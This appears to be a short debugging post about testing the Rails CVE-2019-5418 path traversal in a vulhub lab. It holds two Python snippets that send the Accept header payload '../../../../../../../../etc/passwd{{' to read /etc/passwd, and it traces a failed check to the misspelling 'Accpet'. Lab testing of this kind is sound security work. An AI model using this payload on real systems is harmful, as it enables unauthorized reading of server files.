A friend was testing the https://github.com/vulhub/vulhub/tree/master/rails/CVE-2019-5418 vulnerability.
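They wrote a payload:

```python
import re

# `target` and `util.get_url_response` come from the friend's own scanning
# framework and are not shown in the post.
payload = "../../../../../../../../etc/passwd{{"
header = {
    "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    "Accept-Encoding": "gzip, deflate",
    "Accpet": payload,  # header name exactly as it was written
}
print(header)
target_url = target + "/robots"
res = util.get_url_response(target_url, method='GET', headers=header, timeout=5)
print(res.status_code)
# Count the check as a hit when the response body looks like /etc/passwd.
if res.status_code == 200 and re.search("root:[x*]:0:0:", res.text):
    ...  # the snippet is cut off here in the post
```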
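The payload from GitHub read /etc/passwd successfully, so I then wrote my own:

```python
import requests

headers = {
    "Accept-Encoding": "gzip, deflate",
    "Accept": "../../../../../../../../etc/passwd{{",
    "Accept-Language": "en",
    "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
}
r = requests.get("http://xxx:3000/robots", headers=headers)
print(r.text)
```

This also read the file successfully. Capturing both requests in Wireshark and comparing them showed that the Accept header my friend had written was not taking effect.

A closer comparison showed that Accept had been written as Accpet...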
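The Wireshark comparison above can also be done on the two header dictionaries before anything is sent, which catches this kind of false negative in a scanner check. This is an added example, not code from the original post; the function name `diff_headers` and the 0.8 similarity cutoff are assumptions chosen for illustration.

```python
import difflib

# Header sets copied from the two scripts on this page (values unchanged).
PAYLOAD = "../../../../../../../../etc/passwd{{"
UA = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
WORKING = {
    "Accept-Encoding": "gzip, deflate",
    "Accept": PAYLOAD,
    "Accept-Language": "en",
    "User-Agent": UA,
}
FAILING = {
    "User-Agent": UA,
    "Accept-Encoding": "gzip, deflate",
    "Accpet": PAYLOAD,
}


def diff_headers(reference, candidate, cutoff=0.8):
    """Compare header names case-insensitively (HTTP header names are
    case-insensitive) and pair each unmatched candidate name with the
    closest unmatched reference name, which is how a typo shows up."""
    ref = {k.lower(): k for k in reference}
    cand = {k.lower(): k for k in candidate}
    missing = sorted(set(ref) - set(cand))
    extra = sorted(set(cand) - set(ref))
    typos = []
    for name in extra:
        close = difflib.get_close_matches(name, missing, n=1, cutoff=cutoff)
        if close:
            typos.append((cand[name], ref[close[0]]))
    return {
        "missing": [ref[n] for n in missing],
        "extra": [cand[n] for n in extra],
        "suspected_typos": typos,
    }


if __name__ == "__main__":
    report = diff_headers(WORKING, FAILING)
    for wrong, right in report["suspected_typos"]:
        print(f"{wrong!r} is probably a misspelling of {right!r}")
    print("missing from failing request:", report["missing"])
```

`Accept-Language` is also reported as missing, but only the misspelled `Accept` matters here because that header carries the payload.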